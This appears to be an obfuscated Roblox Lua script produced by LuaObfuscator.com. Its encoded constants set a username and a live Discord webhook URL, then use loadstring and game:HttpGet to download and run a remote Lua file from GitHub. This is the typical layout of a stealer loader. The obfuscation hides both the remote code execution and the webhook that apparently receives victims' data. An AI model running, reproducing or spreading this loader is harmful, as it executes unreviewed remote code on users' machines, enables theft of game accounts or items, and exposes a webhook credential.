--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v69=v2(v0(v20,16));if v19 then local v75=0;local v76;while true do if (v75==1) then return v76;end if (v75==0) then v76=v5(v69,v19);v19=nil;v75=1;end end else return v69;end end end);local function v21(v22,v23,v24)if v24 then local v70=(v22/(((851 -552) -(286 + 11))^(v23-((2337 -740) -(1470 + (1403 -(1211 + 66)))))))%((40 -(9 + 29))^(((v24-(1 + 0)) -(v23-(1565 -(1220 + 344)))) + (1691 -(737 + 953)) + 0)) ;return v70-(v70%(1 -0)) ;else local v71=((848 + 278) -(324 + 800))^(v23-(232 -(19 + 212))) ;return (((v22%(v71 + v71))>=v71) and (1 -0)) or (1136 -(517 + 619)) ;end end local function v25()local v38=0 + 0 + 0 ;local v39;while true do if (v38==(0 -0)) then v39=v1(v16,v18,v18);v18=v18 + (1 -0) ;v38=240 -(218 + 21) ;end if (v38==(808 -(771 + 36))) then return v39;end end end local function v26()local v40,v41=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (1869 -(1519 + 348)) ;return (v41 * (874 -618)) + v40 ;end local function v27()local v42=0 + 0 ;local v43;local v44;local v45;local v46;while true do if ((0 -0)==v42) then v43,v44,v45,v46=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 2 + 2 ;v42=(1081 -(376 + 206)) -(113 + 385) ;end if (v42==(647 -(469 + 177))) then return (v46 * ((176201323 -125539094) -33885013)) + (v45 * (151324 -85788)) + (v44 * (1652 -(313 + 1083))) + v43 ;end end end local function v28()local v47=v27();local v48=v27();local v49=1 -0 ;local v50=(v21(v48,(2 -1) + 0 ,11 + 9 ) * ((840 -(41 + 797))^(831 -(603 + 79 + 117)))) + v47 ;local v51=v21(v48,21,83 -52 );local v52=((v21(v48,32)==(248 -(241 + 6))) and  -1) or ((569 -(484 + 84)) + 0) ;if (v51==(1181 -(1134 + 47))) then if (v50==(227 -(64 + 163))) then return v52 * 0 ;else v51=1427 -(563 + 863) ;v49=0 + 0 ;end elseif (v51==(3723 -(1112 + 564))) then return ((v50==((2803 -1211) -(1456 + 136))) and (v52 * ((3 -2)/0))) or (v52 * NaN) ;end return v8(v52,v51-(389 + 634) ) * (v49 + (v50/((2 + 0)^(123 -71)))) ;end local function v29(v30)local v53=(2619 -(946 + 25)) -(1427 + (483 -262)) ;local v54;local v55;while true do if (v53==(0 -0)) then v54=nil;if  not v30 then local v84=(1930 -(775 + 327)) -(465 + 363) ;while true do if (v84==0) then v30=v27();if (v30==0) then return "";end break;end end end v53=1 -0 ;end if (v53==(3 -1)) then v55={};for v77=86 -((796 -(425 + 319)) + 33) , #v54 do v55[v77]=v2(v1(v3(v54,v77,v77)));end v53=1776 -(1099 + 674) ;end if ((135 -(17 + 117))==v53) then v54=v3(v16,v18,(v18 + v30) -1 );v18=v18 + v30 ;v53=(1 + 1) -0 ;end if (v53==(6 -3)) then return v6(v55);end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v56=0 + 0 ;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;while true do if (v56==(3 + 1)) then while true do if ((938 -(424 + 511))~=v57) then else v64=nil;while true do local v101=0 + 0 ;while true do if (v101==(0 + 0)) then if ((0 + 0)~=v58) then else local v106=0 -0 ;local v107;while true do if (v106==(0 -0)) then v107=0 -0 ;while true do if (v107==(2 + 0)) then v58=2 -1 ;break;end if ((1500 -(312 + 1187))==v107) then v61={};v62={v59,v60,nil,v61};v107=7 -5 ;end if (v107==(1051 -(29 + 1022))) then v59={};v60={};v107=341 -(272 + 68) ;end end break;end end end if (v58~=(3 -1)) then else local v108=0 -0 ;local v109;while true do if (v108==(0 + 0)) then v109=0 -0 ;while true do if (v109~=1) then else for v131=2 -1 ,v27() do v61[v131]=v27();end return v62;end if ((98 -(69 + 29))==v109) then for v133=1 + 0 ,v27() do local v134=0 + 0 ;local v135;local v136;while true do if (v134==(1 -0)) then while true do if (0==v135) then v136=v25();if (v21(v136,1,1 -0 )==(723 -(425 + 298))) then local v161=1069 -(1041 + 28) ;local v162;local v163;local v164;while true do if (v161==3) then if (v21(v163,9 -6 ,7 -4 )==1) then v164[2 + 2 ]=v64[v164[4]];end v59[v133]=v164;break;end if ((2 -1)==v161) then local v167=455 -(52 + 403) ;while true do if (v167~=(0 -0)) then else local v173=0;while true do if (v173==(0 -0)) then v164={v26(),v26(),nil,nil};if (v162==(703 -(547 + 156))) then local v181=245 -(206 + 39) ;local v182;local v183;while true do if (v181==(0 -0)) then v182=1218 -(418 + 800) ;v183=nil;v181=1;end if (v181~=1) then else while true do if (v182==(0 -0)) then v183=0;while true do if (v183==(0 -0)) then v164[3]=v26();v164[4]=v26();break;end end break;end end break;end end elseif (v162==1) then v164[3 -0 ]=v27();elseif (v162==2) then v164[3]=v27() -((2 + 0)^(1904 -(633 + 1255))) ;elseif (v162~=(3 + 0)) then else local v186=0 -0 ;local v187;local v188;while true do if (v186==(0 + 0)) then v187=0;v188=nil;v186=1;end if (v186==(831 -(727 + 103))) then while true do if (v187~=(0 -0)) then else v188=0;while true do if (v188~=(1589 -(1464 + 125))) then else v164[1025 -(753 + 269) ]=v27() -((4 -2)^(14 + 2)) ;v164[3 + 1 ]=v26();break;end end break;end end break;end end end v173=1 + 0 ;end if (v173==(3 -2)) then v167=1 + 0 ;break;end end end if (v167==(1 + 0)) then v161=1 + 1 ;break;end end end if (v161==(3 -1)) then local v168=1237 -(116 + 1121) ;while true do if (v168~=(0 -0)) then else if (v21(v163,2 -1 ,1)==(1 -0)) then v164[5 -3 ]=v64[v164[2]];end if (v21(v163,304 -(213 + 89) ,490 -(76 + 412) )==1) then v164[1 + 2 ]=v64[v164[1 + 2 ]];end v168=1;end if (v168==(1 + 0)) then v161=1845 -(309 + 1533) ;break;end end end if (0==v161) then local v169=0;local v170;while true do if (v169==(0 + 0)) then v170=0;while true do if (v170==0) then local v180=1750 -(441 + 1309) ;while true do if ((0 + 0)~=v180) then else v162=v21(v136,4 -2 ,1743 -(1146 + 594) );v163=v21(v136,4,2 + 4 );v180=1;end if (v180~=(1 + 0)) then else v170=1 + 0 ;break;end end end if (v170~=1) then else v161=3 -2 ;break;end end break;end end end end end break;end end break;end if (0==v134) then v135=0;v136=nil;v134=1;end end end for v137=1 -0 ,v27() do v60[v137-1 ]=v33();end v109=1;end end break;end end end v101=1;end if (v101==(1 + 0)) then if (v58==(264 -(114 + 149))) then v63=v27();v64={};for v112=1 + 0 ,v63 do local v113=0;local v114;local v115;local v116;while true do if ((1 -0)~=v113) then else v116=nil;while true do if (v114~=(1 + 0)) then else if (v115==(2 -1)) then v116=v25()~=(0 -0) ;elseif (v115==2) then v116=v28();elseif (v115~=3) then else v116=v29();end v64[v112]=v116;break;end if (v114~=0) then else v115=v25();v116=nil;v114=1;end end break;end if ((0 + 0)==v113) then v114=477 -(466 + 11) ;v115=nil;v113=1;end end end v62[3 + 0 ]=v25();v58=1019 -(910 + 107) ;end break;end end end break;end if (v57==(1393 -(960 + 433))) then local v95=551 -(82 + 469) ;while true do if (v95==1) then v57=776 -(772 + 3) ;break;end if (v95==(190 -(72 + 118))) then v58=0 + 0 ;v59=nil;v95=1244 -(750 + 493) ;end end end if (v57==(7 -5)) then v62=nil;v63=nil;v57=7 -4 ;end if (v57==1) then local v96=0;while true do if (v96==1) then v57=1 + 1 ;break;end if (v96==(0 + 0)) then v60=nil;v61=nil;v96=560 -(533 + 26) ;end end end end break;end if (v56==(0 + 0)) then v57=0 + 0 ;v58=nil;v56=4 -3 ;end if ((516 -(27 + 487))~=v56) then else v61=nil;v62=nil;v56=925 -(407 + 515) ;end if (1~=v56) then else v59=nil;v60=nil;v56=2;end if (v56==(129 -(121 + 5))) then v63=nil;v64=nil;v56=4 -0 ;end end end local function v34(v35,v36,v37)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v35[3];return function(...)local v79=1;local v80= -1;local v81={...};local v82=v12("#",...) -1 ;local function v83()local v85=v66;local v86=v67;local v87=v68;local v88=v32;local v89={};local v90={};local v91={};for v97=1722 -(469 + 1253) ,v82 do if ((v97>=v87) or (4526==2321)) then v89[v97-v87 ]=v81[v97 + (1 -0) ];else v91[v97]=v81[v97 + (144 -(95 + 48)) ];end end local v92=(v82-v87) + (438 -(69 + 368)) ;local v93;local v94;while true do local v98=0 -0 ;local v99;while true do if ((v98==(1002 -(591 + 411))) or ((7371 -(5334 -(14 + 299)))>(3372 -(112 + 28)))) then v99=0 + 0 ;while true do if ((1416<(8773 -(6931 -(1858 + 16)))) and (v99==0)) then local v111=0;while true do if (((10235 -6315)>(2092 -(1068 + 874))) and (v111==1)) then v99=1898 -((2192 -(485 + 287)) + 477) ;break;end if (((79 + 193)<=(1300 -(549 + 200))) and (v111==((155 -(7 + 148)) + 0))) then v93=v85[v79];v94=v93[1 + 0 ];v111=1 -0 ;end end end if ((939<=((5995 -(132 + 192)) -3874)) and (v99==(1 + 0))) then if ((v94<=4) or ((1498 + 1006)>(9821 -4868))) then if ((v94<=(3 -2)) or ((2353 -(214 + 1038))>(1236 + 1927))) then if (((1528 -820)<=3881) and (v94>(0 + (0 -0)))) then v91[v93[(657 -(13 + 27)) -(278 + 337) ]]();else v91[v93[1131 -(133 + 996) ]]=v93[1455 -(62 + 1390) ];end elseif (((3059 + 544)>=(5268 -(1208 + 742))) and (v94<=2)) then v37[v93[3 + (1360 -(60 + 1300)) ]]=v91[v93[2]];elseif (((1227 + 1539)<=2836) and (v94>(2 + 1))) then local v140=(1063 -(55 + 1008)) -0 ;local v141;local v142;local v143;while true do if (((19296 -14438)>(162 + 1789)) and (v140==0)) then v141=0 + 0 ;v142=nil;v140=1;end if ((((8370 -4308) + 534)>(3201 -(10 + (1935 -(625 + 541))))) and (v140==((646 + 393) -(171 + 867)))) then v143=nil;while true do if (((21865 -17466)>(13688 -10178)) and ((0 + 0)==v141)) then v142=v93[2];v143=v91[v93[2 + 1 ]];v141=1;end if ((((7419 -4155) -(268 + 840))>(153 + 304 + 159)) and (v141==1)) then v91[v142 + 1 ]=v143;v91[v142]=v143[v93[316 -(171 + 141) ]];break;end end break;end end else local v144=(0 -0) + 0 ;local v145;local v146;while true do if (((4942 -(376 + 1144))<=((943 + 4008) -(313 + 106))) and (v144==(966 -(240 + 725)))) then while true do if (((555 + 348)>(1448 -1009)) and (v145==(1414 -(370 + 1044)))) then v146=v93[2 -0 ];v91[v146]=v91[v146](v13(v91,v146 + (1 -0) ,v80));break;end end break;end if ((((1607 + 1243) -1035)>(997 + 27)) and (v144==(0 + 0))) then v145=0 + 0 ;v146=nil;v144=223 -(120 + 89 + 13) ;end end end elseif (((4932 -(911 + (1823 -935)))>=(2368 -1608)) and (v94<=(1582 -(255 + 1321)))) then if ((v94>(3 + 2)) or ((4395 -(80 + 58))==(3655 -1125))) then v91[v93[(5 + 0) -3 ]]=v37[v93[1 + 2 ]];else local v125=0 -0 ;local v126;local v127;local v128;local v129;local v130;while true do if (((3993 -(33 + 1006))>=(1351 + 599)) and (v125==(0 + 0))) then v126=107 -(72 + 35) ;v127=nil;v125=(1125 -276) -(458 + 390) ;end if ((v125==((1306 -(558 + 744)) -2)) or ((1450 -(863 + 134))>=(2831 -(795 + 758)))) then v130=nil;while true do if (((3371 + 579)>=(1049 + 2163)) and (v126==(909 -(278 + 631)))) then local v149=0 -0 ;while true do if ((v149==1) or ((720 -261)>4165)) then v126=1;break;end if ((1813<(180 + 321 + 1809)) and (v149==((2592 -(607 + 1133)) -(265 + (1610 -1023))))) then v127=v93[2];v128,v129=v88(v91[v127](v13(v91,v127 + 1 ,v93[3])));v149=1561 -(663 + 897) ;end end end if (((3305 -2020)<(4480 -2328)) and (v126==(1326 -(204 + 1121)))) then v80=(v129 + v127) -(721 -(62 + 658)) ;v130=339 -((61 -(27 + 11)) + 316) ;v126=2 + 0 ;end if (((763 + 3209)>3071) and (v126==(3 -1))) then for v150=v127,v80 do local v151=0 + (1939 -(1302 + 637)) ;local v152;local v153;while true do if ((3823>(192 + 9)) and (v151==(972 -(805 + 166)))) then while true do if (((1904 -(100 + 1144))==660) and (v152==(0 + 0))) then v153=0;while true do if ((v153==(1030 -(294 + 736))) or (1571>(4765 -(775 + 487)))) then v130=v130 + 1 + 0 ;v91[v150]=v128[v130];break;end end break;end end break;end if ((v151==(0 + 0)) or ((2080 + 492)<(943 + 468 + 294))) then v152=0;v153=nil;v151=1 + 0 ;end end end break;end end break;end if ((v125==1) or ((4159 -(886 + 218))<(632 + 984))) then v128=nil;v129=nil;v125=8 -6 ;end end end elseif (((170 + 670)==(480 + 248 + 112)) and (v94<=(1083 -(678 + (647 -249))))) then do return;end elseif ((v94>(1 + 7)) or ((4854 -3129)>4648)) then v79=v93[358 -(134 + 221) ];elseif ((v91[v93[(2 -0) -0 ]]==v93[7 -3 ]) or ((1076 + 1181)<=1257)) then v79=v79 + (766 -(105 + 660)) ;else v79=v93[3];end v79=v79 + 1 + 0 ;break;end end break;end end end end A,B=v32(v11(v83));if  not A[1] then local v100=v35[4][v79] or "?" ;error("Script error at ["   .. v100   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end if (v65==0) then v66=v35[1];v67=v35[2];v65=1;end end end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O0003083O00557365724E616D65030B3O006461746F6167656E74323303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313834363433303633393031382O31342F39564F482O6351556935413143736E4D734F76734E356E694D3862576B7536595466574F2O79305855417739306653473251414279436F5F726D765473386D6841657754026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C756100143O00124O00013O0026083O0008000100010004093O0008000100122O000100033O001202000100023O00122O000100053O001202000100043O00124O00063O0026083O0001000100060004093O00010001001206000100073O001206000200083O00200400020002000900122O0004000A4O0005000200044O000300013O00022O00010001000100010004093O001300010004093O000100012O00073O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
